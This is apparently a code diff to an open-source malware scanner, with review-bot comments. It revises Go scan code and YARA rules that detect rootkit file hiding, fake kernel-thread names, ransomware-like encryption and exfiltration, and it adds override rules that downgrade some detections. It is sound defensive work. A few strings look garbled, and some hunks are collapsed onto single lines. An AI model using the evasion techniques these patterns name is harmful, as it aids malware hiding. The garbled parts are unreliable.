diff --git a/Makefile b/Makefile
index df6c33ad..bdd2c73a 100644
--- a/Makefile
+++ b/Makefile
@@ -48,7 +48,7 @@ fix: $(FIXERS)
 # END: lint-install ../malcontent
 SAMPLES_REPO ?= chainguard-dev/malcontent-samples
-SAMPLES_COMMIT ?= 83f0693557b748ab4c395bdd749b85876fa53e92
+SAMPLES_COMMIT ?= 01cc2a1248c20c8a3d2b8b0acff0daf04196d487
 OUT_DIR=out/samples-$(SAMPLES_COMMIT).tmp
 out/samples-$(SAMPLES_COMMIT):
 	mkdir -p out
diff --git a/pkg/action/scan.go b/pkg/action/scan.go
index 741276d2..8a9e80d5 100644
--- a/pkg/action/scan.go
+++ b/pkg/action/scan.go
@@ -35,7 +35,7 @@ var (
 )
 // findFilesRecursively returns a list of files found recursively within a path.
-func findFilesRecursively(_ context.Context, rootPath string) ([]string, error) {
+func findFilesRecursively(ctx context.Context, rootPath string) ([]string, error) {
 	var files []string
 	// Follow symlink if provided at the root
@@ -49,10 +49,13 @@ func findFilesRecursively(_ context.Context, rootPath string) ([]string, error)
 		}
 	}
+	logger := clog.FromContext(ctx)
+
 	err = filepath.WalkDir(root, func(path string, info os.DirEntry, err error) error {
 		if err != nil {
-			return fmt.Errorf("walk: %w", err)
+			logger.Errorf("error: %s: %s", path, err)
+			return nil
 		}
 		if info.IsDir() || strings.Contains(path, "/.git/") {
 			return nil
diff --git a/pkg/render/terminal_brief.go b/pkg/render/terminal_brief.go
index 78d662ea..1c5eceef 100644
--- a/pkg/render/terminal_brief.go
+++ b/pkg/render/terminal_brief.go
@@ -15,9 +15,9 @@ import (
 	"context"
 	"fmt"
 	"io"
+	"strings"
 
 	"github.com/chainguard-dev/malcontent/pkg/malcontent"
-	"github.com/fatih/color"
 )
 
 type TerminalBrief struct {
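Review bot: Returning nil from the WalkDir callback after logging also swallows a failure on the root itself — WalkDir reports a failed Lstat of root through the same callback, with a nil DirEntry — so findFilesRecursively can now return an empty list with a nil error for an unreadable root and the caller treats the scan as complete. Skipping unreadable subdirectories best-effort is reasonable, but the root case should still fail: `if path == root { return fmt.Errorf("walk: %w", err) }` placed before the `logger.Errorf` line keeps that behaviour. The callback's `err` parameter shadows the outer `err`; that is pre-existing, but now that the two have different fates a one-line comment would help the next reader. The body of findFilesRecursively continues outside the hunk.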
@@ -37,10 +37,25 @@ func (r TerminalBrief) File(_ context.Context, fr *malcontent.FileReport) error
 		return nil
 	}
-	fmt.Fprintf(r.w, "├── 📄 %s %s%s%s\n", fr.Path, color.HiBlackString("["), riskInColor(fr.RiskLevel), color.HiBlackString("]"))
+	fmt.Fprintf(r.w, "├─ %s %s\n", riskEmoji(fr.RiskScore), fr.Path)
 	for _, b := range fr.Behaviors {
-		fmt.Fprintf(r.w, "│ %s %s: %s\n", riskEmoji(fr.RiskScore), riskColor(fr.RiskLevel, b.ID), b.Description)
+		evidence := []string{}
+		for _, m := range b.MatchStrings {
+			if len(m) > 2 && !strings.Contains(b.Description, m) {
+				evidence = append(evidence, m)
+			}
+		}
+
+		e := strings.Join(evidence, ", ")
+		if len(e) > 32 {
+			e = e[0:31] + "…"
+		}
+		if len(e) > 0 {
+			e = ": " + e
+		}
+
+		fmt.Fprintf(r.w, "│ %s %s — %s%s\n", riskColor(fr.RiskLevel, "•"), riskColor(fr.RiskLevel, b.ID), b.Description, e)
 	}
 	return nil
diff --git a/rules/builtin/kernel_module.yara b/rules/builtin/kernel_module.yara
index cbc6e428..f711b6b7 100644
--- a/rules/builtin/kernel_module.yara
+++ b/rules/builtin/kernel_module.yara
@@ -1,10 +1,11 @@
-
-rule kmod : high {
+rule kmod : medium linux {
   meta:
-    description = "includes Linux kernel module source code"
+    description = "Linux kernel module source code"
     hash_2024_enumeration_deepce = "76b0bcdf0ea0b62cee1c42537ff00d2100c54e40223bbcb8a4135a71582dfa5d"
+    filetypes = "c,h"
   strings:
     $ref = ""
+    $not_define_linux = "#define _LINUX_MODULE_H"
   condition:
-    any of them
+    $ref and none of ($not*)
 }
diff --git a/rules/combo/critical_paths.yara b/rules/combo/critical_paths.yara
deleted file mode 100644
index d5fd1c6c..00000000
--- a/rules/combo/critical_paths.yara
+++ /dev/null
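Review bot: The evidence string is assembled from `b.MatchStrings`, i.e. bytes lifted from the scanned sample, and written to the terminal verbatim, so a sample can place control characters or escape sequences into the brief report; the `len(m) > 2` filter and the description check do not remove them. Separately, `e[0:31]` truncates by byte and can split a multi-byte rune, leaving invalid UTF-8 immediately before the `…`. Filtering to printable runes and truncating by rune count addresses both; `strings.Map` and `unicode.IsPrint` are stdlib, the latter needing `"unicode"` added to the import block. `var evidence []string` would also replace the empty-slice literal. File's signature and closing brace lie outside the hunk.
```go
		e := strings.Join(evidence, ", ")
		// MatchStrings are bytes from the scanned sample; keep only printable
		// runes so a sample cannot inject control or escape sequences into
		// the terminal report.
		e = strings.Map(func(r rune) rune {
			if unicode.IsPrint(r) {
				return r
			}
			return -1
		}, e)
		// Truncate by rune, not byte, so a multi-byte character is not split.
		if r := []rune(e); len(r) > 32 {
			e = string(r[:31]) + "…"
		}
		// … unchanged: ": " prefix and Fprintf …
```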
@@ -1,39 +0,0 @@ - -rule linux_critical_system_paths_medium : medium { - meta: - description = "accesses multiple critical Linux paths" - strings: - $p_var_run = /\/var\/run[\w\/\.\-]{0,32}/ - $p_tmp = /\/tmp\/[\w\/\.\-]{0,32}/ - $p_usr_bin = /\/usr\/bin[\w\/\.\-]{0,32}/ - $p_boot = /\/boot\/[\w\/\.\-]{0,32}/ - $p_proc = /\/proc\/[\w\/\.\-]{0,32}/ - $p_sys = /\/sys\/(devices|class)[\w\/\.\-]{0,32}/ - $p_sysctl = /sysctl[ -a-z]{0,32}/ - condition: - 5 of ($p*) -} - -rule linux_critical_system_paths_high : high { - meta: - description = "accesses multiple critical Linux paths" - strings: - $p_var_run = /\/var\/run[\w\/\.\-]{0,32}/ - $p_tmp = /\/tmp\/[\w\/\.\-]{0,32}/ - $p_usr_bin = /\/usr\/bin[\w\/\.\-]{0,32}/ - $p_boot = /\/boot\/[\w\/\.\-]{0,32}/ - $p_proc = /\/proc\/[\w\/\.\-]{0,32}/ - $p_sys = /\/sys\/(devices|class)[\w\/\.\-]{0,32}/ - $p_sysctl = /sysctl[ -a-z]{0,32}/ - $not_dirty = "/proc/sys/vm/dirty_bytes" - $not_swappy = "/proc/sys/vm/swappiness" - $not_somaxconn = "/prkyioc/sys/kernel/threads-max" - $not_mime = "/etc/apache/mime.types" - $not_clickhouse = "/tmp/jemalloc_clickhouse" - $not_falco = "/etc/falco/certs" - $not_pki = "/etc/pki/tls/cacert.pem" - $not_docker = "/var/run/docker" - $not_bpf = "/proc/sys/kernel/bpf_stats_enabled" - condition: - 6 of ($p*) and none of ($not*) -} diff --git a/rules/combo/degrader/linux_paths.yara b/rules/combo/degrader/linux_paths.yara new file mode 100644 index 00000000..2a15238e --- /dev/null +++ b/rules/combo/degrader/linux_paths.yara 
@@ -0,0 +1,52 @@ + +rule linux_critical_system_paths : medium { + meta: + description = "accesses multiple critical Linux paths" + strings: + $p_etc_crontab = "/etc/crontab" + $p_etc_sysctl_conf = "/etc/sysctl.conf" + $p_etc_init_d = /\/etc\/init.d[\w\/\.\-]{0,32}/ + $p_etc_cron_d = /\/etc\/cron.d[\w\/\.\-]{0,32}/ + $p_etc_selinux = /\/etc\/selinux[\w\/\.\-]{0,32}/ + $p_etc_systemd = /\/etc\/systemd[\w\/\.\-]{0,32}/ + $p_etc_preload = "/etc/ld.so.preload" + $p_ld_so_cache = "/etc/ld.so.cache" + $p_var_run = /\/var\/run[\w\/\.\-]{0,32}/ + $p_var_log = /\/var\/log[\w\/\.\-]{0,32}/ + $p_usr_libexec = /\/usr\/libexec[\w\/\.\-]{0,32}/ + $p_tmp = /\/tmp\/[\w\/\.\-]{0,32}/ + $p_sbin = /\/sbin\/[\w\/\.\-]{0,32}/ + $p_lib_systemd = /\/lib\/systemd[\w\/\.\-]{0,32}/ + $p_boot = /\/boot\/[\w\/\.\-]{0,32}/ + $proc_self_cmdline = "/proc/self/cmdline" + $proc_self_cgroup = "/proc/self/cgroup" + $p_lib = "/usr/lib/x86_64-linux-gnu/" + $p_lib_ld = "/lib64/ld-linux-x86-64.so.2" + $p_sys = /\/sys\/(devices|class)[\w\/\.\-]{0,32}/ + $p_sysctl = /sysctl[ -a-z]{0,32}/ + $p_dev_watchdog = "/dev/watchdog" + $p_ps = "/usr/bin/ps" + $p_ss = "/usr/bin/lsof" + $p_ssh = "/usr/bin/ssh" + $p_dev_shm = "/dev/shm" + condition: + filesize < 120MB and any of ($p_etc*) and 5 of ($p*) +} + +rule linux_critical_system_paths_small_elf : high { + meta: + description = "ELF accesses multiple critical Linux paths" + strings: + $not_vim = "VIMRUNTIME" fullword + condition: + filesize < 10MB and uint32(0) == 1179403647 and linux_critical_system_paths and none of ($not*) +} + +rule linux_critical_system_paths_small_shell : high { + meta: + description = "script accesses multiple critical Linux paths" + strings: + $hash_bang = "#!" + condition: + filesize < 64KB and $hash_bang in (0..2) and linux_critical_system_paths +} diff --git a/rules/combo/degrader/selinux_firewall.yara b/rules/combo/degrader/selinux_firewall.yara index 097f804b..d49c7032 100644 --- a/rules/combo/degrader/selinux_firewall.yara 
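Review bot: `$p_ss = "/usr/bin/lsof"` is named after `ss` but matches lsof, so a hit reports a misleading identifier; `$p_lsof = "/usr/bin/lsof"` says what it is. The two `$proc_self_*` strings lack the `p_` prefix yet still count toward `5 of ($p*)`, because the wildcard matches any identifier starting with `p`; if that is intended, giving them the same prefix makes the count obvious to the next reader. In `$p_etc_init_d` and `$p_etc_cron_d` the dot is unescaped and matches any character, which slightly widens both; `init\.d` and `cron\.d` keep them literal as the other regexes in the rule are. The file is new, so all three rules are in this hunk.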
+++ b/rules/combo/degrader/selinux_firewall.yara @@ -1,9 +1,11 @@ -rule selinux_firewall : high { +rule selinux_firewall : high linux { meta: hash_2023_Unix_Downloader_Rocke_228e = "228ec858509a928b21e88d582cb5cfaabc03f72d30f2179ef6fb232b6abdce97" hash_2023_Unix_Downloader_Rocke_2f64 = "2f642efdf56b30c1909c44a65ec559e1643858aaea9d5f18926ee208ec6625ed" hash_2023_Unix_Downloader_Rocke_6107 = "61075056b46d001e2e08f7e5de3fb9bfa2aabf8fb948c41c62666fd4fab1040f" + filetypes = "elf,so" + description = "references both SELinux and iptables/firewalld" strings: $selinux = /SELINUX[=\w]{0,32}/ fullword $f_iptables = /iptables[ -\w]{0,32}/ @@ -12,6 +14,8 @@ rule selinux_firewall : high { $not_iptables = "iptables-restore" $not_iptables_nft = "iptables-nft" $not_selinux_init = "SELINUX_INIT" + $not_define = "#define" fullword + $not_netlink = "NETLINK" fullword condition: - $selinux and any of ($f*) and none of ($not*) + filesize < 1MB and $selinux and any of ($f*) and none of ($not*) } diff --git a/rules/combo/dropper/binary.yara b/rules/combo/dropper/binary.yara index da52feef..c71793bb 100644 --- a/rules/combo/dropper/binary.yara +++ b/rules/combo/dropper/binary.yara @@ -7,8 +7,9 @@ rule chmod_executable_shell_binary : high { $chmod2 = /chmod [\-\w ]{0,4}\+[rw]{0,2}[75][ \$\@\w\/\.]{0,64}/ $http = "http:" $https = "https:" + $not_example = "try 'chmod +x'" condition: - filesize < 10MB and (uint32(0) == 1179403647 or uint32(0) == 4277009102 or uint32(0) == 3472551422 or uint32(0) == 4277009103 or uint32(0) == 3489328638 or uint32(0) == 3405691582 or uint32(0) == 3199925962) and any of ($chmod*) and any of ($http*) + filesize < 10MB and (uint32(0) == 1179403647 or uint32(0) == 4277009102 or uint32(0) == 3472551422 or uint32(0) == 4277009103 or uint32(0) == 3489328638 or uint32(0) == 3405691582 or uint32(0) == 3199925962) and any of ($chmod*) and any of ($http*) and none of ($not*) } rule download_and_execute : high { 
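Review bot: `$not_define = "#define" fullword` is a bare token rather than the header-guard style exclusion used elsewhere in this commit (`#define _LINUX_MODULE_H`, `#define _LINUX_FSCRYPT_H`), so any ELF or shared object that happens to embed that string — help text, bundled script or shader sources — silently drops out of a high-severity rule; the same applies to `$not_include = "#define "` added to `kallsyms` in rules/kernel/symbol-lookup.yara. `$not_netlink = "NETLINK" fullword` is similarly wide, since many binaries that talk to the kernel carry that identifier. If the intent is to skip kernel or libselinux sources compiled into a sample, a specific guard such as `$not_define = "#define <GUARD_SEEN_IN_THE_FALSE_POSITIVE>"` keeps the exclusion tied to that case, and a `// ` comment above each `$not_*` string naming the sample it came from would make future tightening safe.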
diff --git a/rules/combo/locker/readdir_rename_encrypt.yara b/rules/combo/locker/readdir_rename_encrypt.yara index 06f8c7a9..6e8ce1eb 100644 --- a/rules/combo/locker/readdir_rename_encrypt.yara +++ b/rules/combo/locker/readdir_rename_encrypt.yara @@ -1,10 +1,11 @@ -rule conti_alike : high { +rule conti_alike : high posix { meta: description = "Reads directories, renames files, encrypts files" hash_2023_Downloads_06ab = "06abc46d5dbd012b170c97d142c6b679183159197e9d3f6a76ba5e5abf999725" hash_2023_Downloads_8b57 = "8b57e96e90cd95fc2ba421204b482005fe41c28f506730b6148bcef8316a3201" hash_2023_Downloads_f864 = "f864922f947a6bb7d894245b53795b54b9378c0f7633c521240488e86f60c2c5" + filetypes = "so,elf,macho" strings: $readdir = "readdir" fullword $rename = "rename" fullword @@ -13,6 +14,7 @@ rule conti_alike : high { $enc3 = "Encrypting file" $enc4 = "files_encrypted" $enc5 = "encrypts files" + $not_fscrypt_h = "#define _LINUX_FSCRYPT_H" condition: - filesize < 1MB and $readdir and $rename and any of ($enc*) + filesize < 1MB and $readdir and $rename and any of ($enc*) and none of ($not*) } diff --git a/rules/combo/recon/system_network.yara b/rules/combo/recon/system_network.yara index 09552f09..63c6b9d5 100644 --- a/rules/combo/recon/system_network.yara +++ b/rules/combo/recon/system_network.yara @@ -55,10 +55,11 @@ private rule exfil { filesize < 512KB and any of them } - rule sys_net_recon_exfil : high { - meta: - description = "may exfiltrate collected system and network information" - condition: - sys_net_recon and (obfuscate or exfil) -} \ No newline at end of file + meta: + description = "may exfiltrate collected system and network information" + strings: + $not_curl = "CURLAUTH_ONLY" + condition: + sys_net_recon and (obfuscate or exfil) and none of ($not*) +} diff --git a/rules/evasion/fake-process.yara b/rules/evasion/fake-process.yara index 0864655c..4f3e9d57 100644 --- a/rules/evasion/fake-process.yara +++ b/rules/evasion/fake-process.yara 
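Review bot: `$not_curl = "CURLAUTH_ONLY"` suppresses `sys_net_recon_exfil` for any file that mentions that libcurl constant, which includes binaries statically linked against libcurl, so the exclusion reaches further than the curl documentation or headers it presumably targets. Pairing it with a second marker that only the benign source carries, or at least a `// ` comment above the string naming the false positive, would keep the scope visible. The `sys_net_recon`, `obfuscate` and `exfil` rules the condition depends on are defined above this hunk.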
@@ -1,17 +1,24 @@ -rule fake_kworker_val : critical { +rule fake_kworker : critical linux { meta: description = "Pretends to be a kworker kernel thread" hash_2023_Unix_Downloader_Rocke_228e = "228ec858509a928b21e88d582cb5cfaabc03f72d30f2179ef6fb232b6abdce97" hash_2023_Unix_Downloader_Rocke_2f64 = "2f642efdf56b30c1909c44a65ec559e1643858aaea9d5f18926ee208ec6625ed" hash_2023_Unix_Downloader_Rocke_6107 = "61075056b46d001e2e08f7e5de3fb9bfa2aabf8fb948c41c62666fd4fab1040f" strings: - $kworker = /\[{0,1}kworker\/[\d:\]]{1,5}/ - $kworker2 = "kworker" fullword + $kworker = /\[{0,1}kworker\/[\w\%:\-\]]{1,16}/ $kworker3 = "[kworker" + condition: + filesize < 100MB and any of ($k*) +} +rule kworker : medium linux { + meta: + description = "Mentions kworker" + strings: + $kworker2 = "kworker" fullword $not_under_kworker = "_kworker" condition: - any of ($k*) and none of ($not*) + filesize < 1MB and any of ($k*) and none of ($not*) } rule fake_syslogd : critical { @@ -20,10 +27,10 @@ rule fake_syslogd : critical { strings: $ref = "[syslogd]" condition: - any of them + filesize < 1MB and any of them } -rule fake_bash_val : high { +rule fake_bash : high { meta: description = "Pretends to be a bash process" strings: @@ -32,18 +39,18 @@ rule fake_bash_val : high { filesize < 8KB and $bash } -rule fake_systemd : critical { +rule fake_systemd : critical linux { meta: description = "Pretends to be a systemd worker" strings: $ref = "systemd-worker" fullword condition: - filesize < 100MB and $ref + filesize < 10MB and $ref } -rule fake_process_names : high { +rule known_fake_process_names : high { meta: - description = "mentions known fake process names" + description = "mentions known fake process name" strings: $kdevchecker = "kdevchecker" fullword $kworkerr = "kworkerr" fullword 
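Review bot: The split leaves `fake_kworker : critical` with `any of ($k*)` and no `none of ($not*)`, while its `$kworker` regex still opens with an optional `\[{0,1}`, so an identifier such as `_kworker/…` that the old rule excluded through `$not_under_kworker` now fires at critical; only the new medium `kworker` rule keeps that exclusion. If the underscore case still matters, carry `$not_under_kworker = "_kworker"` into `fake_kworker` and restore `and none of ($not*)` in its condition. The widened `[\w\%:\-\]]{1,16}` class is fine but deserves a `// ` comment saying what motivated `%`, since that is not a character a kernel thread name contains.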
@@ -54,3 +61,17 @@ rule fake_process_names : high { condition: filesize < 10MB and any of them } + +rule multiple_known_fake_process_names : critical { + meta: + description = "mentions multiple known fake process names" + strings: + $kdevchecker = "kdevchecker" fullword + $kworkerr = "kworkerr" fullword + $ksoftriqd = "ksoftriqd" fullword + $kdevtmpfsi = "kdevtmpfsi" fullword + $kthreaddk = "kthreaddk" fullword + $deamon = "deamon" fullword + condition: + filesize < 10MB and 2 of them +} diff --git a/rules/evasion/packer/upx.yara b/rules/evasion/packer/upx.yara index 19d175d7..9e3b8026 100644 --- a/rules/evasion/packer/upx.yara +++ b/rules/evasion/packer/upx.yara @@ -23,8 +23,9 @@ rule upx_elf : high { strings: $proc_self = "/proc/self/exe" $prot_exec = "PROT_EXEC|PROT_WRITE failed" + $not_upx_itself = "UPX comes with ABSOLUTELY NO WARRANTY" condition: - uint32(0) == 1179403647 and $prot_exec and $proc_self + uint32(0) == 1179403647 and $prot_exec and $proc_self and none of ($not*) } rule upx_elf_tampered : critical { diff --git a/rules/evasion/readdir-interceptor.yara b/rules/evasion/readdir-interceptor.yara index 0fae052a..52efb1f3 100644 --- a/rules/evasion/readdir-interceptor.yara +++ b/rules/evasion/readdir-interceptor.yara @@ -1,9 +1,10 @@ rule readdir_intercept : high { meta: - description = "userland rootkit designed to hide files" + description = "userland rootkit designed to hide files (readdir64)" hash_2023_lib_pkit = "8faa04955eeb6f45043003e23af39b86f1dbfaa12695e0e1a1f0bc7a15d0d116" hash_2023_lib_pkitarm = "67de6ba64ee94f2a686e3162f2563c77a7d78b7e0404e338a891dc38ced5bd71" hash_2023_lib_skit = "427b1d16f16736cf8cee43a7c54cd448ca46ac9b573614def400d2d8d998e586" + filetypes = "so,c" strings: $r_new65 = "readdir64" fullword $r_old64 = "_readdir64" 
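Review bot: `$deamon = "deamon" fullword` is a common misspelling in benign scripts and comments, and with `2 of them` it only needs one other term to reach critical, which is a low bar for that severity; `2 of ($k*)` would count only the process-name look-alikes. The six strings duplicate the list in `known_fake_process_names` above, and YARA cannot share string sets across rules, so the two lists will drift unless a comment on each points at the other.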
@@ -19,6 +20,7 @@ rule readdir_tcp_wrapper_intercept : high { meta: description = "userland rootkit designed to hide files and bypass tcp-wrappers" ref = "https://github.com/ldpreload/Medusa" + filetypes = "so,c" strings: $r_new65 = "readdir64" fullword $r_old64 = "_readdir64" @@ -31,21 +33,25 @@ rule readdir_tcp_wrapper_intercept : high { rule readdir_intercept_source : high { meta: - description = "userland rootkit designed to hide files" + description = "userland rootkit source designed to hide files (DECLARE_READDIR)" + filetypes = "so,c" strings: $declare = "DECLARE_READDIR" $hide = "hide" condition: - all of them + filesize < 200KB and all of them } rule lkm_dirent : high { meta: - description = "kernel rootkit designed to hide files" + description = "kernel rootkit designed to hide files (linux_dirent)" hash_2023_LQvKibDTq4_diamorphine = "e93e524797907d57cb37effc8ebe14e6968f6bca899600561971e39dfd49831d" + filetypes = "so" strings: - $dirent = "linux_dirent" - $Linux = "Linux" + $l_dirent = "linux_dirent" + $linux = "Linux" + $not_syscalls = "#define _LINUX_SYSCALLS_H" + $not_itimer = "__kernel_old_itimerval" condition: - all of them + filesize < 2MB and all of ($l*) and none of ($not*) } diff --git a/rules/false_positives/argo_workflows_ui.yara b/rules/false_positives/argo_workflows_ui.yara new file mode 100644 index 00000000..eda3986d --- /dev/null +++ b/rules/false_positives/argo_workflows_ui.yara @@ -0,0 +1,12 @@ +rule bash_js : override { + meta: + description = "bash.js; prism_bash.js" + infection_killer = "medium" + strings: + $bash = "BASH" + $prism = "(Prism)" + $js1 = "function" + $js2 = "var" + condition: + filesize < 32KB and $bash and $prism and all of ($js*) +} diff --git a/rules/false_positives/busybox.yara b/rules/false_positives/busybox.yara new file mode 100644 index 00000000..6c10ef05 --- /dev/null +++ b/rules/false_positives/busybox.yara 
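Review bot: `filetypes = "so"` on `lkm_dirent` sits on a rule described as a kernel rootkit, but loadable kernel modules ship as `.ko`, and the other kernel rules in this commit use `filetypes = "ko,elf,so"`; if this meta scopes which files are scanned, a module sample such as the diamorphine hash listed in the rule, presumably a `.ko`, would be skipped. `filetypes = "ko,elf,so"` matches the sibling rules. `$not_itimer = "__kernel_old_itimerval"` is an ordinary kernel UAPI symbol and a `// ` comment naming the false positive it addresses would help whoever revisits the exclusion.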
@@ -0,0 +1,10 @@ +rule busybox : override { + meta: + description = "busybox" + infection_killer = "medium" + strings: + $description = /BusyBox is a multi-call binary that combines many common Unix\n\tutilities into a single executable./ + $license = "BusyBox is copyrighted by many authors between 1998-2015." + condition: + filesize < 1MB and all of them +} diff --git a/rules/false_positives/clamav.yara b/rules/false_positives/clamav.yara new file mode 100644 index 00000000..9230d5a1 --- /dev/null +++ b/rules/false_positives/clamav.yara @@ -0,0 +1,11 @@ +rule clamav_searchindex_json : override { + meta: + description = "searchindex.json" + linux_rootkit_terms = "medium" + strings: + $clamav = "clamav" + $description = "ClamAV is an open source (GPLv2) anti-virus toolkit, designed especially for e-mail scanning on mail gateways." + $tip = "Tip : ClamAV is not a traditional anti-virus or endpoint security suite." + condition: + filesize < 5MB and all of them +} diff --git a/rules/false_positives/druid.yara b/rules/false_positives/druid.yara new file mode 100644 index 00000000..d2067da1 --- /dev/null +++ b/rules/false_positives/druid.yara @@ -0,0 +1,11 @@ +rule wikiticker : override { + meta: + description = "wikiticker-2015-09-12-sampled.json" + crypto_stealer_names = "medium" + common_username_block_list = "medium" + strings: + $channel = /#.{2}.wikipedia/ + $wikipedia = /https:\/\/.{2}.wikipedia.org/ + condition: + filesize < 20MB and all of them +} diff --git a/rules/false_positives/filebeat.yara b/rules/false_positives/filebeat.yara new file mode 100644 index 00000000..93439d31 --- /dev/null +++ b/rules/false_positives/filebeat.yara @@ -0,0 +1,12 @@ +rule misp_mdjson : override { + meta: + description = "misp_sample.mdjson.log" + lvt = "medium" + strings: + $attribute = "Attribute" + $event = "Event" + $galaxy = "Galaxy" + $shadow = "ShadowAttribute" + condition: + filesize < 128KB and all of them +} 
diff --git a/rules/false_positives/google_cloud_sdk.yara b/rules/false_positives/google_cloud_sdk.yara new file mode 100644 index 00000000..bd0f1e28 --- /dev/null +++ b/rules/false_positives/google_cloud_sdk.yara @@ -0,0 +1,11 @@ +rule gcloud_mysql_py : override { + meta: + description = "mysql.py" + infection_killer = "medium" + strings: + $description = "This installer will install mysql-server on an Ubuntu machine." + $install = "apt-get -y install mysql-server" + $license = "# Copyright (c) 2006-2009 Mitch Garnaat http://garnaat.org/" + condition: + filesize < 10KB and all of them +} diff --git a/rules/false_positives/jellyfin.yara b/rules/false_positives/jellyfin.yara new file mode 100644 index 00000000..14444b84 --- /dev/null +++ b/rules/false_positives/jellyfin.yara @@ -0,0 +1,11 @@ +rule swashbuckle_dll : override { + meta: + description = "Swashbuckle.AspNetCore.ReDoc.dll" + infection_killer = "medium" + strings: + $description = "Middleware to expose an embedded version of Redoc from an ASP.NET Core application" + $license = "&Copyright (c) 2016-2024 Richard Morris" + $repository = "https://github.com/domaindrivendev/Swashbuckle.AspNetCore" + condition: + filesize < 1MB and all of them +} diff --git a/rules/false_positives/kubeflow_centraldashboard.yara b/rules/false_positives/kubeflow_centraldashboard.yara new file mode 100644 index 00000000..69854f31 --- /dev/null +++ b/rules/false_positives/kubeflow_centraldashboard.yara @@ -0,0 +1,12 @@ +rule make_win_ps1 : override { + meta: + description = "make-win.ps1" + SECUINFRA_SUSP_Powershell_Base64_Decode = "medium" + strings: + $end = "END=OF=COMPILER" + $registry = "gcr.io/kubeflow-images-public/centraldashboard" + $repository = "https://github.com/avdaredevil/AP-Compiler" + $start = "START=OF=COMPILER" + condition: + filesize < 10KB and all of them +} diff --git a/rules/false_positives/linux_src.yara b/rules/false_positives/linux_src.yara new file mode 100644 index 00000000..81a1d02d --- /dev/null 
+++ b/rules/false_positives/linux_src.yara @@ -0,0 +1,17 @@ +rule linux_test_script : override linux { + meta: + semicolon_short_tmp = "medium" + bash_dev_tcp = "medium" + relative_background_launcher = "medium" + chattr_immutable_caller_high = "medium" + hidden_short_path = "medium" + kernel_module_loader = "medium" + cd_root = "medium" + description = "Linux test script" + strings: + $gpl = "# SPDX-License-Identifier: GPL-2.0" + $bash = "#!/bin/bash" + $sh = "#!/bin/sh" + condition: + filesize < 32KB and $gpl in (1..256) and ($bash in (0..8) or $sh in (0..8)) +} diff --git a/rules/false_positives/mattermost.yara b/rules/false_positives/mattermost.yara new file mode 100644 index 00000000..1477d155 --- /dev/null +++ b/rules/false_positives/mattermost.yara @@ -0,0 +1,10 @@ +rule mm_client_js_map : override { + meta: + description = "3937.844b09f50594ca2613b4.js" + casing_obfuscation = "medium" + strings: + $mattermost = "mattermost" + $powershell = "PowerShell" + condition: + filesize < 20KB and all of them +} diff --git a/rules/false_positives/mlflow.yara b/rules/false_positives/mlflow.yara index ab7e3e57..46d18fef 100644 --- a/rules/false_positives/mlflow.yara +++ b/rules/false_positives/mlflow.yara @@ -1,4 +1,4 @@ -rule pypi_packages : override { +rule mlflow_pypi_packages : override { meta: description = "pypi_package_index.json" killer_miner_panchansminingisland = "low" @@ -17,3 +17,14 @@ rule pypi_packages : override { condition: $index_date and $package_names and 5 of ($s*) } + +rule mlflow_webpack : override { + meta: + description = "203.b7219352.chunk.js" + infection_killer = "medium" + strings: + $mlflow = "mlflow" + $webpack = "webpack" + condition: + filesize < 1MB and $webpack and #mlflow > 0 +} diff --git a/rules/false_positives/nmap.yara b/rules/false_positives/nmap.yara new file mode 100644 index 00000000..345a6947 --- /dev/null +++ b/rules/false_positives/nmap.yara 
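Review bot: `linux_test_script` downgrades seven rules, including `kernel_module_loader` and `bash_dev_tcp`, for any file under 32KB whose first 256 bytes carry a GPL-2.0 SPDX line and a `#!/bin/sh` or `#!/bin/bash` shebang, and that describes a great many shell scripts outside the kernel tree rather than its test scripts specifically. Anchoring the override on something only those scripts contain — `$tree = "<STRING_SPECIFIC_TO_THE_KERNEL_TEST_SCRIPTS>"` added to the condition — keeps the downgrade from applying to arbitrary GPL scripts. The `description` line would read better first in `meta`, as the other rules in this commit order it.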
@@ -0,0 +1,11 @@ +rule nmap_fingerprints : override { + meta: + description = "http-fingerprints.lua" + SIGNATURE_BASE_Hacktool_Strings_P0Wnedshell = "medium" + strings: + $description = "---HTTP Fingerprint files" + $license = "This file is released under the Nmap license" + $fingerprint = /fingerprint.{0,32}/ + condition: + filesize < 512KB and $description and $license and #fingerprint > 0 +} diff --git a/rules/false_positives/py_versioneer.yara b/rules/false_positives/py_versioneer.yara new file mode 100644 index 00000000..f31ebe2e --- /dev/null +++ b/rules/false_positives/py_versioneer.yara @@ -0,0 +1,10 @@ +rule versioneer_py : override { + meta: + description = "versioneer.py" + python_exec_near_enough = "medium" + strings: + $script = "versioneer.py" + $versioneer = "VERSIONEER" + condition: + filesize < 200KB and all of them +} diff --git a/rules/false_positives/rust.yara b/rules/false_positives/rust.yara new file mode 100644 index 00000000..ace0f9fe --- /dev/null +++ b/rules/false_positives/rust.yara 
@@ -0,0 +1,35 @@ +rule emscripten : override { + meta: + description = "emscripten.sh" + curl_chmod_relative_run_tiny = "medium" + strings: + $license = "Copyright 2017 The Rust Project Developers." + $script = "emscripten" + $sdk = "emsdk" + condition: + filesize < 2KB and all of them +} + +rule linux_s390x : override { + meta: + description = "linux-s390x.sh" + curl_chmod_relative_run_tiny = "medium" + strings: + $img = "https://github.com/qemu/qemu/raw/master/pc-bios/s390-ccw.img" + $initrd = "http://ftp.debian.org/debian/dists/testing/main/installer-s390x/20170828/images/generic/initrd.debian" + $kernel = "http://ftp.debian.org/debian/dists/testing/main/installer-s390x/20170828/images/generic/kernel.debian" + condition: + filesize < 1024 and all of them +} + +rule linux_sparc64 : override { + meta: + description = "linux-sparc64.sh" + curl_chmod_relative_run_tiny = "medium" + strings: + $iso = "https://cdimage.debian.org/cdimage/ports/9.0/sparc64/iso-cd/debian-9.0-sparc64-NETINST-1.iso" + $initrd = "debian-9.0-sparc64-NETINST-1.iso boot/initrd.gz" + $kernel = "debian-9.0-sparc64-NETINST-1.iso boot/sparc64" + condition: + filesize < 1024 and all of them +} diff --git a/rules/false_positives/sqlpad.yara b/rules/false_positives/sqlpad.yara new file mode 100644 index 00000000..327ae9ef --- /dev/null +++ b/rules/false_positives/sqlpad.yara @@ -0,0 +1,11 @@ +rule azure_kvkeys_index_js : override { + meta: + description = "index.js.map" + lvt = "medium" + strings: + $azure = "Azure Key Vault" + $license1 = "Copyright (c) Microsoft Corporation" + $license2 = "Licensed under the MIT license" + condition: + filesize < 512KB and all of them +} diff --git a/rules/false_positives/thingsboard.yara b/rules/false_positives/thingsboard.yara new file mode 100644 index 00000000..79d46f7e --- /dev/null +++ b/rules/false_positives/thingsboard.yara 
